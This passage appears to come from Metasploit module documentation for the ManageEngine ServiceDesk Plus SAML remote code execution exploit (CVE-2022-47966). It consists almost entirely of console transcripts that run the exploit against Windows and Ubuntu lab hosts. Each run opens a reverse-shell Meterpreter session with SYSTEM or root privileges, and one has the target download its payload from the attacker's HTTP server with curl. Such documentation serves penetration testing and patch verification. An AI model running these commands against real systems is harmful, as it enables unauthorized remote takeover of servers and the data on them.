msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.104 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.100.104
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.104:51417) at 2023-01-26 12:07:43 +0100
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

### ServiceDesk Plus versions 14003 on Windows - Target 0 (`Windows EXE Dropper`)
```
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 0
target => 0
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.104 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (200774 bytes) to 192.168.100.104
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.104:51435) at 2023-01-26 12:08:42 +0100
[*] Command Stager progress - 100.00% done (12025/12025 bytes)
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

### ServiceDesk Plus versions 14003 on Linux (Ubuntu) - Target 2 (`Unix Command`)
```
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 2
target => 2
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.109 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (24380 bytes) to 192.168.100.109
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.109:43062) at 2023-01-26 16:07:21 +0100
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-58-generic #64~20.04.1-Ubuntu SMP Fri Jan 6 16:42:31 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: root
```

### ServiceDesk Plus versions 14003 on Linux (Ubuntu) - Target 2 (`Unix Dropper`)
```
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 3
target => 3
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.109 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.100.1:8080/55oyjyc1i
[*] Client 192.168.100.109 (curl/7.68.0) requested /55oyjyc1i
[*] Sending payload to 192.168.100.109 (curl/7.68.0)
[*] Sending stage (3045348 bytes) to 192.168.100.109
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.109:40138) at 2023-01-26 16:09:37 +0100
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.100.109
OS           : Ubuntu 20.04 (Linux 5.15.0-58-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```